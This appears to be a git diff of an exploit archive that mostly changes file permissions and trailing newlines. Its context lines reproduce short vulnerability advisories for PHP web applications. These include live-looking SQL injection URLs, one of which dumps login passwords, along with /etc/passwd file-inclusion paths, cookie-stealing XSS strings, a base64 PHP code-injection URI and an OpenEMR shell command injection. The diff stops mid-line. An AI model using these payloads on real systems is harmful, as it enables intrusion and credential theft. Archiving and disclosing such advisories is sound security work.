exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36591.txt b/platforms/php/webapps/36591.txt old mode 100755 new mode 100644 index 5982ccfc6..b6b03ff21 --- a/platforms/php/webapps/36591.txt +++ b/platforms/php/webapps/36591.txt @@ -4,4 +4,4 @@ The Full ('com_full') component for Joomla! is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_full&dzial=dam_prace&id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_full&dzial=dam_prace&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36592.txt b/platforms/php/webapps/36592.txt old mode 100755 new mode 100644 index 5402b55ef..ae26c023a --- a/platforms/php/webapps/36592.txt +++ b/platforms/php/webapps/36592.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi] http://www.example.com/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi] http://www.example.com/index.php?option=com_sanpham&view=product&modelsid=[SQLi] -http://www.example.com/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36593.txt b/platforms/php/webapps/36593.txt old mode 100755 new mode 100644 index f2e89f2fd..f34d650e6 --- a/platforms/php/webapps/36593.txt +++ b/platforms/php/webapps/36593.txt @@ -4,4 +4,4 @@ The 'com_xball' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL) \ No newline at end of file + http://www.example.com/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL) \ No newline at end of file diff --git a/platforms/php/webapps/36594.txt b/platforms/php/webapps/36594.txt old mode 100755 new mode 100644 index 455a3ae2e..ac0dc5552 --- a/platforms/php/webapps/36594.txt +++ b/platforms/php/webapps/36594.txt @@ -4,4 +4,4 @@ The 'com_boss' component for Joomla! is prone to a local file-include vulnerabil An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_boss&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_boss&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36595.txt b/platforms/php/webapps/36595.txt old mode 100755 new mode 100644 index bf71e5244..96eb2913d --- a/platforms/php/webapps/36595.txt +++ b/platforms/php/webapps/36595.txt @@ -8,4 +8,4 @@ http://www.example.com/index.php?option=com_car&view=product&modelsid=[SQLi] http://www.example.com/index.php?option=com_car&view=product&task=showAll&markid=[SQLi] http://www.example.com/index.php?option=com_car&brand_id=[SQLi] http://www.example.com/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi] -http://www.example.com/index.php?option=com_car&view=product&markid=&modelsid=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_car&view=product&markid=&modelsid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36596.txt b/platforms/php/webapps/36596.txt old mode 100755 new mode 100644 index de4876c4f..439ff554c --- a/platforms/php/webapps/36596.txt +++ b/platforms/php/webapps/36596.txt @@ -4,4 +4,4 @@ The 'com_some' component for Joomla! is prone to a local file-include vulnerabil An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_some&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_some&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36597.txt b/platforms/php/webapps/36597.txt old mode 100755 new mode 100644 index 50f5354b2..f504fcc02 --- a/platforms/php/webapps/36597.txt +++ b/platforms/php/webapps/36597.txt @@ -4,4 +4,4 @@ The 'com_bulkenquery' component for Joomla! is prone to a local file-include vul An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_bulkenquery&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_bulkenquery&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36598.txt b/platforms/php/webapps/36598.txt old mode 100755 new mode 100644 index de8a1223f..fde7fdfe9 --- a/platforms/php/webapps/36598.txt +++ b/platforms/php/webapps/36598.txt @@ -4,4 +4,4 @@ The 'com_kp' component for Joomla! is prone to a local file-include vulnerabilit An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_kp&controller=[LFI] \ No newline at end of file +http://www.example.com/index.php?option=com_kp&controller=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/36600.txt b/platforms/php/webapps/36600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36601.txt b/platforms/php/webapps/36601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36610.txt b/platforms/php/webapps/36610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36611.txt b/platforms/php/webapps/36611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36612.txt b/platforms/php/webapps/36612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36613.txt b/platforms/php/webapps/36613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36614.txt b/platforms/php/webapps/36614.txt old mode 100755 new mode 100644 index b2bb038a9..c645145c6 --- a/platforms/php/webapps/36614.txt +++ b/platforms/php/webapps/36614.txt @@ -48,4 +48,4 @@ upload_ad_image + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en -- https://www.youtube.com/watch?v=8IU9EtUTkxI \ No newline at end of file +- https://www.youtube.com/watch?v=8IU9EtUTkxI \ No newline at end of file diff --git a/platforms/php/webapps/36615.txt b/platforms/php/webapps/36615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36616.txt b/platforms/php/webapps/36616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36617.txt b/platforms/php/webapps/36617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36618.txt b/platforms/php/webapps/36618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36620.txt b/platforms/php/webapps/36620.txt old mode 100755 new mode 100644 index e0c599940..759952ab9 --- a/platforms/php/webapps/36620.txt +++ b/platforms/php/webapps/36620.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow YouSayToo auto-publishing 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36621.txt b/platforms/php/webapps/36621.txt old mode 100755 new mode 100644 index fb7436488..f8fa71c5b --- a/platforms/php/webapps/36621.txt +++ b/platforms/php/webapps/36621.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, e glFusion 1.2.2 is vulnerable; other versions may also be affected. http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6-- -http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6-- \ No newline at end of file +http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6-- \ No newline at end of file diff --git a/platforms/php/webapps/36623.txt b/platforms/php/webapps/36623.txt old mode 100755 new mode 100644 index 4292ae7ee..020ad0eb9 --- a/platforms/php/webapps/36623.txt +++ b/platforms/php/webapps/36623.txt @@ -4,4 +4,4 @@ Ultimate Locator is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login-- \ No newline at end of file +http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login-- \ No newline at end of file diff --git a/platforms/php/webapps/36624.txt b/platforms/php/webapps/36624.txt old mode 100755 new mode 100644 index 422760697..28097eef7 --- a/platforms/php/webapps/36624.txt +++ b/platforms/php/webapps/36624.txt @@ -4,4 +4,4 @@ The 'com_jesubmit' component for Joomla! is prone to a vulnerability that lets a An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. -http://www.example.com/index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en \ No newline at end of file +http://www.example.com/index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en \ No newline at end of file diff --git a/platforms/php/webapps/36625.txt b/platforms/php/webapps/36625.txt old mode 100755 new mode 100644 index 5daba7096..c42d4ee81 --- a/platforms/php/webapps/36625.txt +++ b/platforms/php/webapps/36625.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a OSClass 2.3.3 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202 \ No newline at end of file +http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202 \ No newline at end of file diff --git a/platforms/php/webapps/36626.txt b/platforms/php/webapps/36626.txt old mode 100755 new mode 100644 index 649b1bbdb..06ffa586d --- a/platforms/php/webapps/36626.txt +++ b/platforms/php/webapps/36626.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Eal http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E -http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E \ No newline at end of file +http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E \ No newline at end of file diff --git a/platforms/php/webapps/36627.txt b/platforms/php/webapps/36627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36628.txt b/platforms/php/webapps/36628.txt old mode 100755 new mode 100644 index 3e10192d3..a749328a4 --- a/platforms/php/webapps/36628.txt +++ b/platforms/php/webapps/36628.txt @@ -8,4 +8,4 @@ vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected. http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4= -http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt \ No newline at end of file +http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt \ No newline at end of file diff --git a/platforms/php/webapps/36629.txt b/platforms/php/webapps/36629.txt old mode 100755 new mode 100644 index 23d153922..daf77f9f4 --- a/platforms/php/webapps/36629.txt +++ b/platforms/php/webapps/36629.txt @@ -4,4 +4,4 @@ The 'com_motor' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/index.php?option=com_motor&controller=motor&task=edit&cid[0]=[SQL Injection] \ No newline at end of file + http://www.example.com/index.php?option=com_motor&controller=motor&task=edit&cid[0]=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/3663.htm b/platforms/php/webapps/3663.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36630.txt b/platforms/php/webapps/36630.txt old mode 100755 new mode 100644 index 16927bf8a..1dc10a9de --- a/platforms/php/webapps/36630.txt +++ b/platforms/php/webapps/36630.txt @@ -15,4 +15,4 @@ http://www.example.com/index.php?option=com_products&catid=1&Cat[]=[SQL Injectio http://www.example.com/index.php?option=com_products&cid=[SQL Injection] http://www.example.com/index.php?option=com_products&view=products&id=19&cat=[SQL Injection] http://www.example.com/index.php?option=com_products&task=product&pid=[SQL Injection] -http://www.example.com/index.php?option=com_products&Itemid=[SQL Injection] \ No newline at end of file +http://www.example.com/index.php?option=com_products&Itemid=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36631.txt b/platforms/php/webapps/36631.txt old mode 100755 new mode 100644 index 01b43dfea..658aa468a --- a/platforms/php/webapps/36631.txt +++ b/platforms/php/webapps/36631.txt @@ -4,4 +4,4 @@ Slideshow Gallery for WordPress is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script> \ No newline at end of file +http://www.example.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36632.txt b/platforms/php/webapps/36632.txt old mode 100755 new mode 100644 index 85c06bb66..dbe752ccc --- a/platforms/php/webapps/36632.txt +++ b/platforms/php/webapps/36632.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable. -http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/36634.txt b/platforms/php/webapps/36634.txt old mode 100755 new mode 100644 index b065b0343..3c36fde73 --- a/platforms/php/webapps/36634.txt +++ b/platforms/php/webapps/36634.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php?option=com_visa&controller=../../../../../../.. http://www.example.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection] -http:/www.example.com/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection] \ No newline at end of file +http:/www.example.com/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36635.txt b/platforms/php/webapps/36635.txt old mode 100755 new mode 100644 index f7fb4e29a..9b8113663 --- a/platforms/php/webapps/36635.txt +++ b/platforms/php/webapps/36635.txt @@ -4,4 +4,4 @@ The 'com_firmy' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/index.php?option=com_firmy&task=section_show_set&Id=[SQLinjection] \ No newline at end of file + http://www.example.com/index.php?option=com_firmy&task=section_show_set&Id=[SQLinjection] \ No newline at end of file diff --git a/platforms/php/webapps/36638.txt b/platforms/php/webapps/36638.txt old mode 100755 new mode 100644 index 8f63ed7bc..f49fadc38 --- a/platforms/php/webapps/36638.txt +++ b/platforms/php/webapps/36638.txt @@ -4,4 +4,4 @@ The 'com_crhotels' component for Joomla! is prone to a remote SQL injection vuln A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_crhotels&view=cate&catid=[SQL Injection] \ No newline at end of file +http://www.example.com/index.php?option=com_crhotels&view=cate&catid=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36639.txt b/platforms/php/webapps/36639.txt old mode 100755 new mode 100644 index f9f52ccb7..f58a41eed --- a/platforms/php/webapps/36639.txt +++ b/platforms/php/webapps/36639.txt @@ -4,4 +4,4 @@ The 'com_propertylab' component for Joomla! is prone to a remote SQL injection v A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_propertylab&task=showproperty&id=[SQLinjection] \ No newline at end of file +http://www.example.com/index.php?option=com_propertylab&task=showproperty&id=[SQLinjection] \ No newline at end of file diff --git a/platforms/php/webapps/36640.txt b/platforms/php/webapps/36640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36641.txt b/platforms/php/webapps/36641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36642.txt b/platforms/php/webapps/36642.txt old mode 100755 new mode 100644 index cf1392137..1d56c8074 --- a/platforms/php/webapps/36642.txt +++ b/platforms/php/webapps/36642.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access http://www.example.com/index.php?option=com_bbs&bid=[SQLi] http://www.example.com/index.php?option=com_bbs&task=list&bid=[SQLi] -http://www.example.com/index.php?option=com_bbs&Itemid=xxx&task=search&search_type=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_bbs&Itemid=xxx&task=search&search_type=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36643.txt b/platforms/php/webapps/36643.txt old mode 100755 new mode 100644 index 1cb017b3c..0a63da6d0 --- a/platforms/php/webapps/36643.txt +++ b/platforms/php/webapps/36643.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to perform spoofing and phishing attacks, 4images 1.7.10 is vulnerable; other versions may also be affected. -http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection) \ No newline at end of file +http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection) \ No newline at end of file diff --git a/platforms/php/webapps/36644.txt b/platforms/php/webapps/36644.txt old mode 100755 new mode 100644 index 2eb0a72f9..c09a28151 --- a/platforms/php/webapps/36644.txt +++ b/platforms/php/webapps/36644.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to perform spoofing and phishing attacks, 4images 1.7.10 is vulnerable; other versions may also be affected. -http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS) \ No newline at end of file +http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS) \ No newline at end of file diff --git a/platforms/php/webapps/36645.txt b/platforms/php/webapps/36645.txt old mode 100755 new mode 100644 index 9f7e402e3..3f24baae8 --- a/platforms/php/webapps/36645.txt +++ b/platforms/php/webapps/36645.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to perform spoofing and phishing attacks, 4images 1.7.10 is vulnerable; other versions may also be affected. -http://www.example.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248& action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass \ No newline at end of file +http://www.example.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248& action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass \ No newline at end of file diff --git a/platforms/php/webapps/36646.txt b/platforms/php/webapps/36646.txt old mode 100755 new mode 100644 index 709ad3913..07b42f834 --- a/platforms/php/webapps/36646.txt +++ b/platforms/php/webapps/36646.txt @@ -4,4 +4,4 @@ The 'com_cmotour' component for Joomla! is prone to an SQL injection vulnerabili A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?index.php?option=com_cmotour&task=cat&Itemid=xxx&id=[SQL Injection] \ No newline at end of file +http://www.example.com/index.php?index.php?option=com_cmotour&task=cat&Itemid=xxx&id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36647.txt b/platforms/php/webapps/36647.txt old mode 100755 new mode 100644 index 0222a6dce..9c6af7a6f --- a/platforms/php/webapps/36647.txt +++ b/platforms/php/webapps/36647.txt @@ -4,4 +4,4 @@ Lead Capture is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/admin/login.php?message=[XSS] \ No newline at end of file +http://www.example.com/admin/login.php?message=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36648.txt b/platforms/php/webapps/36648.txt old mode 100755 new mode 100644 index c4350f45f..cd96844e6 --- a/platforms/php/webapps/36648.txt +++ b/platforms/php/webapps/36648.txt @@ -6,4 +6,4 @@ A remote attacker can exploit these issues to execute arbitrary shell commands w OpenEMR 4.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/interface/patient_file/encounter/trend_form.php?formname=../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/interface/patient_file/encounter/trend_form.php?formname=../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36649.txt b/platforms/php/webapps/36649.txt old mode 100755 new mode 100644 index 28d27bdd9..c8e4979ff --- a/platforms/php/webapps/36649.txt +++ b/platforms/php/webapps/36649.txt @@ -6,4 +6,4 @@ A remote attacker can exploit these issues to execute arbitrary shell commands w OpenEMR 4.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/3665.htm b/platforms/php/webapps/3665.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36650.txt b/platforms/php/webapps/36650.txt old mode 100755 new mode 100644 index 55f3843b3..a54bbe06b --- a/platforms/php/webapps/36650.txt +++ b/platforms/php/webapps/36650.txt @@ -6,4 +6,4 @@ A remote attacker can exploit these issues to execute arbitrary shell commands w OpenEMR 4.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36651.txt b/platforms/php/webapps/36651.txt old mode 100755 new mode 100644 index 64f932125..895d07775 --- a/platforms/php/webapps/36651.txt +++ b/platforms/php/webapps/36651.txt @@ -6,4 +6,4 @@ A remote attacker can exploit these issues to execute arbitrary shell commands w OpenEMR 4.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123 \ No newline at end of file +http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123 \ No newline at end of file diff --git a/platforms/php/webapps/36654.txt b/platforms/php/webapps/36654.txt old mode 100755 new mode 100644 index 277b0189d..dc40c0d8f --- a/platforms/php/webapps/36654.txt +++ b/platforms/php/webapps/36654.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable. http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub& -filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search \ No newline at end of file +filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search \ No newline at end of file diff --git a/platforms/php/webapps/36655.txt b/platforms/php/webapps/36655.txt old mode 100755 new mode 100644 index fd6c9a1e7..60873e36e --- a/platforms/php/webapps/36655.txt +++ b/platforms/php/webapps/36655.txt @@ -8,4 +8,4 @@ phpLDAPadmin 1.2.0.5-2 is affected; other versions may also be vulnerable. https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script> -https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false \ No newline at end of file +https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false \ No newline at end of file diff --git a/platforms/php/webapps/36656.txt b/platforms/php/webapps/36656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36657.txt b/platforms/php/webapps/36657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36658.txt b/platforms/php/webapps/36658.txt old mode 100755 new mode 100644 index 3f2aba3c0..5ae87567c --- a/platforms/php/webapps/36658.txt +++ b/platforms/php/webapps/36658.txt @@ -4,4 +4,4 @@ iknSupport is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search \ No newline at end of file +http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search \ No newline at end of file diff --git a/platforms/php/webapps/36659.txt b/platforms/php/webapps/36659.txt old mode 100755 new mode 100644 index cc0b3831d..3a9c4d33b --- a/platforms/php/webapps/36659.txt +++ b/platforms/php/webapps/36659.txt @@ -4,4 +4,4 @@ The Currency Converter component for Joomla! is prone to a cross-site scripting An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS] \ No newline at end of file +http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36660.txt b/platforms/php/webapps/36660.txt old mode 100755 new mode 100644 index cba4fe85b..a3cc7eff4 --- a/platforms/php/webapps/36660.txt +++ b/platforms/php/webapps/36660.txt @@ -4,4 +4,4 @@ project-open is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/register/account-closed?message=[arbitrary-JavaScript] \ No newline at end of file +http://www.example.com/register/account-closed?message=[arbitrary-JavaScript] \ No newline at end of file diff --git a/platforms/php/webapps/36661.txt b/platforms/php/webapps/36661.txt old mode 100755 new mode 100644 index 7b08d2ce1..2ccf4ed2e --- a/platforms/php/webapps/36661.txt +++ b/platforms/php/webapps/36661.txt @@ -4,4 +4,4 @@ PHP-Fusion is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/weblinks.php?weblink_id=[Sql] \ No newline at end of file +http://www.example.com/weblinks.php?weblink_id=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/36664.txt b/platforms/php/webapps/36664.txt old mode 100755 new mode 100644 index d4d59d81c..1321bec71 --- a/platforms/php/webapps/36664.txt +++ b/platforms/php/webapps/36664.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip Vespa 0.8.6 is vulnerable; other versions may also be affected. - http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00 \ No newline at end of file + http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/36665.txt b/platforms/php/webapps/36665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36668.txt b/platforms/php/webapps/36668.txt old mode 100755 new mode 100644 index 9a8f531f0..a14c30372 --- a/platforms/php/webapps/36668.txt +++ b/platforms/php/webapps/36668.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow eFront 3.6.10 is vulnerable; other versions may also be affected. http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable& -limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C \ No 